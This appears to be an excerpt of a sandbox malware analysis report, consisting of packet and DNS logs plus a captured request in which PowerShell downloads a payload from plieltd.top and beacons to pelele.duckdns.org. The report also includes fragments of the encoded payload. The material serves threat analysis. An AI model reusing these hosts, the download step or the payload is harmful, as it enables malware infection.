                                                              Oct 21, 2024 14:18:15.470638990 CEST4982351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:15.471199989 CEST4982351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:15.476537943 CEST5152549823185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:16.486998081 CEST4984351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:16.492400885 CEST5152549843185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:16.492479086 CEST4984351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:16.495937109 CEST4984351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:16.502448082 CEST5152549843185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:18.489263058 CEST5152549843185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:18.489327908 CEST4984351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:18.489834070 CEST4984351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:18.495148897 CEST5152549843185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:19.502723932 CEST4986351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:19.508070946 CEST5152549863185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:19.508160114 CEST4986351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:19.511666059 CEST4986351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:19.517005920 CEST5152549863185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:20.996464968 CEST5152549863185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:20.996536970 CEST4986351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:20.997266054 CEST4986351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:21.002557039 CEST5152549863185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:22.002640009 CEST4987451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:22.007951975 CEST5152549874185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:22.008043051 CEST4987451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:22.012067080 CEST4987451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:22.017363071 CEST5152549874185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:24.548481941 CEST5152549874185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:24.548551083 CEST4987451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:24.549149036 CEST4987451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:24.554450035 CEST5152549874185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:25.564985991 CEST4989551525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:25.570561886 CEST5152549895185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:25.572984934 CEST4989551525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:25.576467037 CEST4989551525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:25.581789970 CEST5152549895185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:28.144119978 CEST5152549895185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:28.144206047 CEST4989551525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:28.144790888 CEST4989551525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:28.145375967 CEST5152549895185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:28.145443916 CEST4989551525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:28.150509119 CEST5152549895185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:29.158726931 CEST4991451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:29.164275885 CEST5152549914185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:29.164371014 CEST4991451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:29.167627096 CEST4991451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:29.173047066 CEST5152549914185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:31.950159073 CEST5152549914185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:31.950213909 CEST4991451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:31.950853109 CEST4991451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:31.951520920 CEST5152549914185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:31.951576948 CEST4991451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:31.953054905 CEST5152549914185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:31.953099012 CEST4991451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:31.964205980 CEST5152549914185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:32.955626011 CEST4993351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:32.960959911 CEST5152549933185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:32.961054087 CEST4993351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:32.964984894 CEST4993351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:32.970340967 CEST5152549933185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:34.176229000 CEST5152549933185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:34.176306963 CEST4993351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:34.176980019 CEST4993351525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:34.182374954 CEST5152549933185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:35.189749956 CEST4994551525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:35.195383072 CEST5152549945185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:35.195455074 CEST4994551525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:35.199145079 CEST4994551525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:35.204504013 CEST5152549945185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:36.264326096 CEST5152549945185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:36.264503002 CEST4994551525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:36.264952898 CEST4994551525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:36.270308018 CEST5152549945185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:37.268143892 CEST4995851525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:37.274034977 CEST5152549958185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:37.274266005 CEST4995851525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:37.277553082 CEST4995851525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:37.283446074 CEST5152549958185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:38.555641890 CEST5152549958185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:38.555738926 CEST4995851525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:38.556441069 CEST4995851525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:38.563296080 CEST5152549958185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:39.564796925 CEST4997151525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:39.570270061 CEST5152549971185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:39.572971106 CEST4997151525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:39.576141119 CEST4997151525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:39.581449986 CEST5152549971185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:40.757301092 CEST5152549971185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:40.757395983 CEST4997151525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:40.757921934 CEST4997151525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:40.763331890 CEST5152549971185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:41.770102024 CEST4998451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:41.775475979 CEST5152549984185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:41.775572062 CEST4998451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:41.779006958 CEST4998451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:41.784797907 CEST5152549984185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:43.466159105 CEST5152549984185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:43.466320038 CEST4998451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:43.466855049 CEST4998451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:43.472409010 CEST5152549984185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:44.608932018 CEST4999951525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:44.614775896 CEST5152549999185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:44.614840984 CEST4999951525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:44.618324995 CEST4999951525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:44.623656034 CEST5152549999185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:46.400322914 CEST5152549999185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:46.400378942 CEST4999951525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:46.400774956 CEST4999951525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:46.406112909 CEST5152549999185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:47.408930063 CEST5001151525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:47.414470911 CEST5152550011185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:47.414680958 CEST5001151525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:47.417948961 CEST5001151525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:47.423327923 CEST5152550011185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:49.663383961 CEST5152550011185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:49.663579941 CEST5001151525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:49.663862944 CEST5001151525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:49.669146061 CEST5152550011185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:50.674637079 CEST5002251525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:50.680237055 CEST5152550022185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:50.680309057 CEST5002251525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:50.684725046 CEST5002251525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:50.690054893 CEST5152550022185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:52.877264977 CEST5152550022185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:52.877338886 CEST5002251525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:52.877835035 CEST5002251525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:52.883116961 CEST5152550022185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:53.893035889 CEST5003451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:53.898492098 CEST5152550034185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:53.898639917 CEST5003451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:53.902997971 CEST5003451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:53.908329010 CEST5152550034185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:55.536040068 CEST5152550034185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:55.536725998 CEST5003451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:55.537074089 CEST5003451525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:55.542383909 CEST5152550034185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:56.551544905 CEST5003651525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:56.557032108 CEST5152550036185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:56.557106972 CEST5003651525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:56.562191010 CEST5003651525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:56.567517042 CEST5152550036185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:58.130728006 CEST5152550036185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:58.130786896 CEST5003651525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:58.131131887 CEST5003651525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:58.136498928 CEST5152550036185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:59.143456936 CEST5003751525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:59.149036884 CEST5152550037185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:18:59.154874086 CEST5003751525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:59.154874086 CEST5003751525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:18:59.160298109 CEST5152550037185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:00.887933969 CEST5152550037185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:00.887989044 CEST5003751525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:00.888389111 CEST5003751525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:00.893876076 CEST5152550037185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:01.900207996 CEST5003851525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:01.905648947 CEST5152550038185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:01.909004927 CEST5003851525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:01.912909985 CEST5003851525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:01.918148994 CEST5152550038185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:03.666543007 CEST5152550038185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:03.667579889 CEST5003851525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:03.667707920 CEST5003851525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:03.673508883 CEST5152550038185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:04.675399065 CEST5003951525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:04.680726051 CEST5152550039185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:04.680951118 CEST5003951525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:04.685096979 CEST5003951525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:04.690483093 CEST5152550039185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:06.491698027 CEST5152550039185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:06.491923094 CEST5003951525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:06.492172956 CEST5003951525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:06.497591019 CEST5152550039185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:09.003364086 CEST5004051525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:09.009274960 CEST5152550040185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:09.009402990 CEST5004051525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:09.012902021 CEST5004051525192.168.2.4185.236.203.101
                                                              Oct 21, 2024 14:19:09.018532991 CEST5152550040185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:09.993027925 CEST5152550040185.236.203.101192.168.2.4
                                                              Oct 21, 2024 14:19:09.993139029 CEST5004051525192.168.2.4185.236.203.101

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 21, 2024 14:16:57.398597002 CEST5957653192.168.2.41.1.1.1
                                                              Oct 21, 2024 14:16:57.413911104 CEST53595761.1.1.1192.168.2.4
                                                              Oct 21, 2024 14:17:00.148324966 CEST5019553192.168.2.41.1.1.1
                                                              Oct 21, 2024 14:17:00.841559887 CEST53501951.1.1.1192.168.2.4
                                                              Oct 21, 2024 14:17:43.623811960 CEST5891053192.168.2.41.1.1.1
                                                              Oct 21, 2024 14:17:43.731971025 CEST53589101.1.1.1192.168.2.4
                                                              Oct 21, 2024 14:18:44.471508980 CEST5409653192.168.2.41.1.1.1
                                                              Oct 21, 2024 14:18:44.608259916 CEST53540961.1.1.1192.168.2.4

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Oct 21, 2024 14:16:57.398597002 CEST192.168.2.41.1.1.10xeb17Standard query (0)gormezl_6777.6777.6777.677eA (IP address)IN (0x0001)false
                                                              Oct 21, 2024 14:17:00.148324966 CEST192.168.2.41.1.1.10xbe5cStandard query (0)plieltd.topA (IP address)IN (0x0001)false
                                                              Oct 21, 2024 14:17:43.623811960 CEST192.168.2.41.1.1.10x601eStandard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false
                                                              Oct 21, 2024 14:18:44.471508980 CEST192.168.2.41.1.1.10xa2c6Standard query (0)pelele.duckdns.orgA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Oct 21, 2024 14:16:57.413911104 CEST1.1.1.1192.168.2.40xeb17Name error (3)gormezl_6777.6777.6777.677enonenoneA (IP address)IN (0x0001)false
                                                              Oct 21, 2024 14:17:00.841559887 CEST1.1.1.1192.168.2.40xbe5cNo error (0)plieltd.top172.67.155.139A (IP address)IN (0x0001)false
                                                              Oct 21, 2024 14:17:00.841559887 CEST1.1.1.1192.168.2.40xbe5cNo error (0)plieltd.top104.21.56.189A (IP address)IN (0x0001)false
                                                              Oct 21, 2024 14:17:43.731971025 CEST1.1.1.1192.168.2.40x601eNo error (0)pelele.duckdns.org185.236.203.101A (IP address)IN (0x0001)false
                                                              Oct 21, 2024 14:18:44.608259916 CEST1.1.1.1192.168.2.40xa2c6No error (0)pelele.duckdns.org185.236.203.101A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • plieltd.top

                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449737172.67.155.1394437876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-21 12:17:01 UTC170OUTGET /Tlles187.deploy HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: plieltd.top
                                                              Connection: Keep-Alive
                                                              2024-10-21 12:17:02 UTC952INHTTP/1.1 200 OK
                                                              Date: Mon, 21 Oct 2024 12:17:01 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 486712
                                                              Connection: close
                                                              Last-Modified: Mon, 21 Oct 2024 10:23:47 GMT
                                                              ETag: "76d38-624fa0c530e5a"
                                                              Accept-Ranges: bytes
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=atYqvYnHq7AztC5NGuBDUWbfjByGgYzE0TBpHX3JNHQywgQ1nHejPX55bg5yQQht%2FyZ8tvr%2Bk%2BOOJZv2U71VXuwrQTqDFB4QxmLgr8vm7f2gey6C5cOpJ5C50auCvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                              X-Content-Type-Options: nosniff
                                                              Server: cloudflare
                                                              CF-RAY: 8d612ea0fb5f6c70-DFW
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1158&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=784&delivery_rate=2456318&cwnd=251&unsent_bytes=0&cid=7aa2606a712f76cd&ts=564&x=0"
                                                              2024-10-21 12:17:02 UTC417INData Raw: 36 77 4a 4b 35 58 45 42 6d 37 75 31 31 51 38 41 63 51 47 62 36 77 49 32 53 51 4e 63 4a 41 54 72 41 74 63 46 36 77 49 33 37 4c 6d 37 67 71 65 72 63 51 47 62 63 51 47 62 67 66 45 67 78 70 64 78 36 77 49 38 65 58 45 42 6d 34 48 78 6d 30 51 77 32 75 73 43 57 62 72 72 41 6f 6c 6d 36 77 4c 75 4f 75 73 43 59 32 61 36 52 78 72 39 6a 33 45 42 6d 2b 73 43 4e 62 4e 78 41 5a 74 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 2f 6e 2b 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 75 73 43 77 55 39 78 41 5a 75 44 77 51 52 78 41 5a 76 72 41 69 35 64 67 66 6b 4c 48 57 73 44 66 4d 31 78 41 5a 76 72 41 6d 53 51 69 30 51 6b 42 48 45 42 6d 2b 73 43 5a 6b 43 4a 77 2b 73 43 46 34 5a 78 41 5a 75 42 77 31 63 6b 4f 77 42 78 41 5a 76 72 41 6c 2f 47 75 6b 7a 53 57 66 52 78 41 5a 74 78 41 5a 75
                                                              Data Ascii: 6wJK5XEBm7u11Q8AcQGb6wI2SQNcJATrAtcF6wI37Lm7gqercQGbcQGbgfEgxpdx6wI8eXEBm4Hxm0Qw2usCWbrrAolm6wLuOusCY2a6Rxr9j3EBm+sCNbNxAZtxAZsxynEBm+sC/n+JFAtxAZtxAZvR4usCwU9xAZuDwQRxAZvrAi5dgfkLHWsDfM1xAZvrAmSQi0QkBHEBm+sCZkCJw+sCF4ZxAZuBw1ckOwBxAZvrAl/GukzSWfRxAZtxAZu
                                                              2024-10-21 12:17:02 UTC1369INData Raw: 43 51 45 63 51 47 62 63 51 47 62 69 65 74 78 41 5a 74 78 41 5a 75 42 77 35 77 41 41 41 44 72 41 6a 6a 39 63 51 47 62 55 2b 73 43 37 73 4a 78 41 5a 74 71 51 4f 73 43 6c 78 50 72 41 69 32 63 69 65 76 72 41 70 65 51 63 51 47 62 78 34 4d 41 41 51 41 41 41 41 42 2b 41 2b 73 43 47 39 39 78 41 5a 75 42 77 77 41 42 41 41 44 72 41 75 45 4e 63 51 47 62 55 2b 73 43 47 56 78 78 41 5a 75 4a 36 33 45 42 6d 33 45 42 6d 34 6d 37 42 41 45 41 41 48 45 42 6d 2b 73 43 33 73 57 42 77 77 51 42 41 41 44 72 41 73 53 33 36 77 4c 63 34 6c 50 72 41 6c 63 6c 63 51 47 62 61 76 39 78 41 5a 76 72 41 6a 68 4f 67 38 49 46 63 51 47 62 63 51 47 62 4d 66 5a 78 41 5a 74 78 41 5a 73 78 79 65 73 43 46 78 62 72 41 6a 31 66 69 78 70 78 41 5a 74 78 41 5a 74 42 63 51 47 62 36 77 49 57 64 54 6b 63
                                                              Data Ascii: CQEcQGbcQGbietxAZtxAZuBw5wAAADrAjj9cQGbU+sC7sJxAZtqQOsClxPrAi2cievrApeQcQGbx4MAAQAAAAB+A+sCG99xAZuBwwABAADrAuENcQGbU+sCGVxxAZuJ63EBm3EBm4m7BAEAAHEBm+sC3sWBwwQBAADrAsS36wLc4lPrAlclcQGbav9xAZvrAjhOg8IFcQGbcQGbMfZxAZtxAZsxyesCFxbrAj1fixpxAZtxAZtBcQGb6wIWdTkc
                                                              2024-10-21 12:17:02 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6e 44 55 2f 45 34 44 2b 5a 61 63 46 56 48 6b 6a 67 50 37 76 71 56 72 63 65 53 4f 41 2f 6b 45 58 37 4c 78 35 4f 34 44 2b 79 78 6d 7a 4e 41 36 52 45 5a 44 42 6a 53 41 74 39 31 61 32 4c 2f 68 58 70 50 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70 50 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70 50 62 34 56 78 42 61 31 73 75 39 39 34 44 6c 30 53 62 7a 6d 67 67 63 35 4c 57 50 2b 4a 44 41 65 57 54 36 57 4b 54 6e 6d 6c 65 6b 39 76 68 58 70 50 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70 50 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70 45 52 35 6c 2f 48 74 47 4f 4c 4f 4d 48 64 50 48 6c 67 34 7a 43 63 65 6b
                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnDU/E4D+ZacFVHkjgP7vqVrceSOA/kEX7Lx5O4D+yxmzNA6REZDBjSAt91a2L/hXpPb4V6T2+Fek9vhXpPb4V6T2+Fek9vhXpPb4VxBa1su994Dl0Sbzmggc5LWP+JDAeWT6WKTnmlek9vhXpPb4V6T2+Fek9vhXpPb4V6T2+Fek9vhXpER5l/HtGOLOMHdPHlg4zCcek
                                                              2024-10-21 12:17:02 UTC1369INData Raw: 34 56 36 54 32 2b 46 65 6b 57 73 47 4e 4e 59 76 58 6c 4d 46 71 67 39 5a 54 61 50 6c 4c 70 6e 63 58 45 43 65 6e 6b 77 43 72 39 69 4b 63 70 50 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70 50 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70 50 62 34 56 36 54 32 55 4c 4e 74 63 6e 52 32 4c 30 73 49 56 71 54 32 72 2b 67 46 79 37 31 79 4a 51 45 67 67 75 71 76 65 61 41 58 72 39 4c 44 4a 54 48 4f 47 48 72 68 72 73 73 74 45 50 46 70 4f 63 38 4c 4b 37 66 4e 63 46 69 59 76 52 49 53 58 77 72 54 6b 2b 39 76 31 63 58 6c 66 50 34 44 72 6d 48 32 34 6c 55 64 73 39 70 6f 4d 79 62 69 31 46 41 70 51 55 64 7a 4d 77 6d 63 47 4b 63 42 47 6f 79 79 45 68 74 33 46 6b 6b 61 55 41 44 57 59 6f 37 2b 4e 5a 31 2f 39 72 30 62 51 61 47 33 59 77 78 6c 7a 6e 5a 59 5a 39 4d 5a 64 55 61 57 46 4a
                                                              Data Ascii: 4V6T2+FekWsGNNYvXlMFqg9ZTaPlLpncXECenkwCr9iKcpPb4V6T2+Fek9vhXpPb4V6T2+Fek9vhXpPb4V6T2ULNtcnR2L0sIVqT2r+gFy71yJQEgguqveaAXr9LDJTHOGHrhrsstEPFpOc8LK7fNcFiYvRISXwrTk+9v1cXlfP4DrmH24lUds9poMybi1FApQUdzMwmcGKcBGoyyEht3FkkaUADWYo7+NZ1/9r0bQaG3YwxlznZYZ9MZdUaWFJ
                                                              2024-10-21 12:17:02 UTC1005INData Raw: 39 76 6a 39 64 55 6b 77 76 34 66 4f 74 51 51 66 61 36 51 6b 77 33 63 4c 6c 57 42 32 7a 64 5a 58 6c 42 47 41 6d 33 63 54 37 38 42 79 76 4e 5a 50 64 63 7a 49 6a 48 2f 4c 72 70 67 78 45 55 74 38 4c 64 63 70 46 76 30 43 48 79 33 73 6d 38 36 68 75 6b 73 4b 7a 66 58 76 44 31 41 39 4e 47 52 4c 77 57 2f 6e 34 2b 6f 38 70 6a 2f 6e 42 48 48 73 50 6d 51 53 7a 4b 32 51 6c 74 42 65 6f 74 61 49 30 71 64 61 6c 51 35 35 55 34 41 45 4e 6c 63 61 2b 66 6d 65 46 76 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70 50 62 34 56 36 54 32 2b 46 65 6b 39 76 68 58 70 50 62 34 56 36 54 32 2b 4f 43 30 79 6f 62 41 30 65 7a 48 78 72 4a 69 44 65 58 55 5a 4b 64 39 51 48 46 75 79 53 58 61 33 41 4f 53 6a 74 6a 65 45 52 33 35 56 36 53 6c 51 36 4e 58 4a 75 7a 57 56 32 51 37 72 39 31 33 43 79 2f
                                                              Data Ascii: 9vj9dUkwv4fOtQQfa6Qkw3cLlWB2zdZXlBGAm3cT78ByvNZPdczIjH/LrpgxEUt8LdcpFv0CHy3sm86huksKzfXvD1A9NGRLwW/n4+o8pj/nBHHsPmQSzK2QltBeotaI0qdalQ55U4AENlca+fmeFvb4V6T2+Fek9vhXpPb4V6T2+Fek9vhXpPb4V6T2+OC0yobA0ezHxrJiDeXUZKd9QHFuySXa3AOSjtjeER35V6SlQ6NXJuzWV2Q7r913Cy/
